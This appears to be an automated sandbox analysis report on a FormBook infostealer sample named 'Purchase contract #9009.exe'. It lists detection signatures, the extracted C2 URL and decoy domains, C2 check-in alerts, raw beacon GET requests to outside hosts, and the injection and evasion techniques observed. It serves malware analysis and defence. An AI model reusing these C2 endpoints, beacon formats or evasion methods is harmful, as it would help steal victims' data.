Windows Analysis Report Purchase contract #9009.exe

Overview

General Information

Sample Name: Purchase contract #9009.exe
Analysis ID: 458959
MD5: acff75235867dd82b2679b4afd3ad525
SHA1: 072839587fc2c193afd5963c467502be89815c2a
SHA256: 84f6beeecfc24544df0a59c7b7f0961c44d835f95f23289dac5730decc2d4957
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.narrowpathwc.com/n8ba/"], "decoy": ["thefitflect.com", "anytourist.com", "blggz.xyz", "ascope.club", "obyeboss.com", "braun-mathematik.online", "mtsnurulislamsby.com", "jwpropertiestn.com", "animalds.com", "cunerier.com", "sillysocklife.com", "shopliyonamaaghin.net", "theredcymbalsco.com", "lostbikeproject.com", "ryggoqlmga.club", "realestatetriggers.com", "luvlauricephotography.com", "cheesehome.cloud", "5fashionfix.net", "wata-6-rwem.net", "ominvestment.net", "rrinuwsq643do2.xyz", "teamtacozzzz.com", "newjerseyreosales.com", "theresahovo.com", "wowmovies.today", "77k6tgikpbs39.net", "americagoldenwheels.com", "digitaladbasket.com", "gcagame.com", "arielatkins.net", "2020coaches.com", "effthisshit.com", "nycabl.com", "fbvanminh.com", "lovebirdsgifts.com", "anxietyxpill.com", "recaptcha-lnc.com", "aprendelspr.com", "expatinsur.com", "backtothesimplethings.com", "pcf-it.services", "wintonplaceoh.com", "designermotherhood.com", "naamt.com", "lifestylebykendra.com", "thehighstatusemporium.com", "oneninelacrosse.com", "mariasmoworldwide.com", "kitesurf-piraten.net", "atelierbond.com", "mynjelderlaw.com", "moucopia.com", "hauhome.club", "imroundtable.com", "thralink.com", "baoequities.com", "nassy.cloud", "goldenstatelabradoodles.com", "revenueremedyintensive.com", "dfendglobal.com", "pugliaandgastronomy.com", "cypios.net", "trinioware.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: Purchase contract #9009.exe Virustotal: Detection: 25%
Source: Purchase contract #9009.exe ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\nzRFOjxWpomfsw.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Purchase contract #9009.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.MSBuild.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Purchase contract #9009.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase contract #9009.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000004.00000002.717581490.000000000169F000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.905256355.0000000004BEF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, explorer.exe
Source: Binary string: explorer.pdb source: MSBuild.exe, 00000004.00000002.717925108.0000000003200000.00000040.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000009.00000002.905538196.0000000005007000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.677675912.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop esi 4_2_00415806
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4x nop then pop esi 9_2_02EB5806

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49760 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49763 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 95.215.210.10:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49767 -> 199.34.228.189:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.narrowpathwc.com/n8ba/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=RqoVB/kRDotnM81a68VGCKAD0SwVXhGBA2hw7fPCanVTcO/r0wYF2QFNLO8vRrR2bvla&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.narrowpathwc.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=+h7Xj+nXKVKiaIR46Fq1cf2yPuoKyU42UFvvfLIT79wfatbgIi2aH2e1i+WvrVB3N3qO&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.braun-mathematik.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=fB7/mPW92pywn6Xwyqh18GEo+pmrDDvkC2n8/jDO98DpKsBXISRlqcqxysno3HWOzWNm&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.lifestylebykendra.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=uqosld0xCubOoSnMdKEGpsNAFVDy7sF9Olr0VLFZOqMlxplbtWpRciavlLjLwEv6WKyy&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.teamtacozzzz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=u7WOyhgrWbXbYgRGE85LieZphkZvcqsYIxt4hYVfzjTWHfz/MeXFN6mo9gA2dLoLONcI&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.ascope.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=6Zij7uW2iyXo7QMuDf/VYdYdyy83rT/k8hgIaZr1o/2iUx0BtZlp/rHpkQfYtJhmSC7t&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.5fashionfix.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=S2NOBXxegNI52ult/GTqJZ9TvZOj5eG5l/LBY5m0t3ElylZ3sbPSB2bMMu9lbAS6Kry+&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.mtsnurulislamsby.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=AVTd1ZN6JRCl2+QDYW+9mBRbWrEnsObc4Gp+SjPu6IU64q2qqDnQOXVzARk/xsnwgByw&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.wintonplaceoh.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n8ba/?3fu=xPi5BDAvQynHSVlVR/YHv5A7cLya1z2oKdj6PcHoa0/Qm6A62p0xrLdBVFxzQSXilAdH&j8DLQj=lVUPCP0PhN HTTP/1.1 Host: www.backtothesimplethings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 95.215.210.10
Source: Joe Sandbox View IP Address: 209.99.40.222
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NEWIT-ASRU
Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View ASN Name: WEEBLYUS
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115
Source: unknown DNS traffic detected: queries for: www.narrowpathwc.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Tue, 03 Aug 2021 20:58:18 GMT Server: Apache X-Powered-By: PHP/7.4.21 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://braun-mathematik.de/wp-json/>; rel="https://api.w.org/" Data Raw: 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 4e<!DOCTYPE html><html class="no-js" lang="de-DE"><head><meta charset="
Source: Purchase contract #9009.exe, 00000001.00000003.641815533.00000000054C6000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.683639738.000000000B970000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase contract #9009.exe
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004181C0 NtCreateFile, 4_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418270 NtReadFile, 4_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004182F0 NtClose, 4_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004183A0 NtAllocateVirtualMemory, 4_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041826C NtReadFile, 4_2_0041826C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418215 NtCreateFile, 4_2_00418215
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004182EA NtClose, 4_2_004182EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_015E9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E99A0 NtCreateSection,LdrInitializeThunk, 4_2_015E99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9840 NtDelayExecution,LdrInitializeThunk, 4_2_015E9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_015E9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_015E98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9A50 NtCreateFile,LdrInitializeThunk, 4_2_015E9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_015E9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9A20 NtResumeThread,LdrInitializeThunk, 4_2_015E9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9540 NtReadFile,LdrInitializeThunk, 4_2_015E9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E95D0 NtClose,LdrInitializeThunk, 4_2_015E95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_015E9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_015E9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_015E9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_015E97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_015E9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_015E96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9950 NtQueueApcThread, 4_2_015E9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E99D0 NtCreateProcessEx, 4_2_015E99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015EB040 NtSuspendThread, 4_2_015EB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9820 NtEnumerateKey, 4_2_015E9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E98A0 NtWriteVirtualMemory, 4_2_015E98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9B00 NtSetValueKey, 4_2_015E9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015EA3B0 NtGetContextThread, 4_2_015EA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9A10 NtQuerySection, 4_2_015E9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9A80 NtOpenDirectoryObject, 4_2_015E9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9560 NtWriteFile, 4_2_015E9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015EAD30 NtSetContextThread, 4_2_015EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9520 NtWaitForSingleObject, 4_2_015E9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E95F0 NtQueryInformationFile, 4_2_015E95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9770 NtSetInformationFile, 4_2_015E9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015EA770 NtOpenThread, 4_2_015EA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9760 NtOpenProcess, 4_2_015E9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015EA710 NtOpenProcessToken, 4_2_015EA710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9730 NtQueryVirtualMemory, 4_2_015E9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9650 NtQueryValueKey, 4_2_015E9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9670 NtQueryInformationProcess, 4_2_015E9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E9610 NtEnumerateValueKey, 4_2_015E9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E96D0 NtCreateKey, 4_2_015E96D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B395D0 NtClose,LdrInitializeThunk, 9_2_04B395D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39540 NtReadFile,LdrInitializeThunk, 9_2_04B39540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_04B396E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B396D0 NtCreateKey,LdrInitializeThunk, 9_2_04B396D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_04B39660
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39650 NtQueryValueKey,LdrInitializeThunk, 9_2_04B39650
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39780 NtMapViewOfSection,LdrInitializeThunk, 9_2_04B39780
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39FE0 NtCreateMutant,LdrInitializeThunk, 9_2_04B39FE0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39710 NtQueryInformationToken,LdrInitializeThunk, 9_2_04B39710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_04B39860
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39840 NtDelayExecution,LdrInitializeThunk, 9_2_04B39840
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B399A0 NtCreateSection,LdrInitializeThunk, 9_2_04B399A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_04B39910
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39A50 NtCreateFile,LdrInitializeThunk, 9_2_04B39A50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B395F0 NtQueryInformationFile, 9_2_04B395F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B3AD30 NtSetContextThread, 9_2_04B3AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39520 NtWaitForSingleObject, 9_2_04B39520
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39560 NtWriteFile, 9_2_04B39560
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39610 NtEnumerateValueKey, 9_2_04B39610
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39670 NtQueryInformationProcess, 9_2_04B39670
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B397A0 NtUnmapViewOfSection, 9_2_04B397A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39730 NtQueryVirtualMemory, 9_2_04B39730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B3A710 NtOpenProcessToken, 9_2_04B3A710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B3A770 NtOpenThread, 9_2_04B3A770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39770 NtSetInformationFile, 9_2_04B39770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39760 NtOpenProcess, 9_2_04B39760
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B398A0 NtWriteVirtualMemory, 9_2_04B398A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B398F0 NtReadVirtualMemory, 9_2_04B398F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39820 NtEnumerateKey, 9_2_04B39820
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B3B040 NtSuspendThread, 9_2_04B3B040
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B399D0 NtCreateProcessEx, 9_2_04B399D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_04B39950 NtQueueApcThread, 9_2_04B39950
